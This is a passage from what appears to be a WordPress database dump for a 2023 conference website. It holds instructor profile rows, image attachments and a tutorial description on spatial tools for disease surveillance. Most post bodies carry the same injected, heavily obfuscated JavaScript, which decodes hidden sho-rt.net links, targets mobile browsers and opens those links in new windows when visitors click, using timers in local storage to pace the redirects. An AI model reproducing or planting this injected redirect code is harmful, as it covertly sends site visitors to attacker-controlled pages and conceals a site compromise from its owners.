g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','DR.Dilek Koç San','','publish','closed','closed','','dilek-koc-san','','','2023-02-07 01:04:49','2023-02-07 01:04:49','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3696',0,'dt_team','',0),
(3697,1,'2023-02-02 08:27:27','2023-02-02 08:27:27','','tut3','','inherit','open','closed','','tut3','','','2023-02-02 08:27:27','2023-02-02 08:27:27','',3696,'https://gsw2023.com/wp-content/uploads/2023/02/tut3.jpg',0,'attachment','image/jpeg',0),
(3698,1,'2023-02-02 08:30:29','2023-02-02 08:30:29','<!-- wp:paragraph -->\n<p>School of Computer Sciences, University of Petroleum &amp; Energy Studies, Dehradun, INDIA</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>ISPRS Secretary, WG IV/10</strong></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','DR.Priyanka Singh','','publish','closed','closed','','priyanka-singh','','','2023-02-07 01:11:01','2023-02-07 01:11:01','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3698',0,'dt_team','',0),
(3699,1,'2023-02-02 08:30:06','2023-02-02 08:30:06','','tut4','','inherit','open','closed','','tut4','','','2023-02-02 08:30:06','2023-02-02 08:30:06','',3698,'https://gsw2023.com/wp-content/uploads/2023/02/tut4.jpg',0,'attachment','image/jpeg',0),
(3700,1,'2023-02-02 08:40:35','2023-02-02 08:40:35','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3685\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5>Tutorial Topic</h5>\n<h6 style=\"text-align: justify;\">The past century has seen an unprecedented burden of infectious, chronic and vector-borne diseases that threaten the public and global health. There are also direct implications on wildlife populations. Understanding the spatial processes and temporal dynamics are important for guiding policy informed decisions. Policymakers, public health officials, and academic researchers are key stakeholders in the fight against diseases. For instance, the recent COVID-19 pandemic has generated tremendous amount of data which is of prime importance. The availability of spatial tools with analytical &amp; visualization capability provided meaningful insights in handling public health data for scientific understanding of disease trends and patterns. Hence, there is a clear need of simple one-stop solution that is backed by reliable data source.</h6>\n<h6 style=\"text-align: justify;\">In this tutorial, we focus on techniques and spatial tools for (i) optimal data collection on disease occurrence and surveillance through citizen-centric approach, (ii) machine learning based statistical modelling tools for active surveillance, and (iii) analysing the spatial complexity of diseases through visualization support.</h6>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\">Short Profile &amp; Affiliation of Instructors</h4>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"70\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const 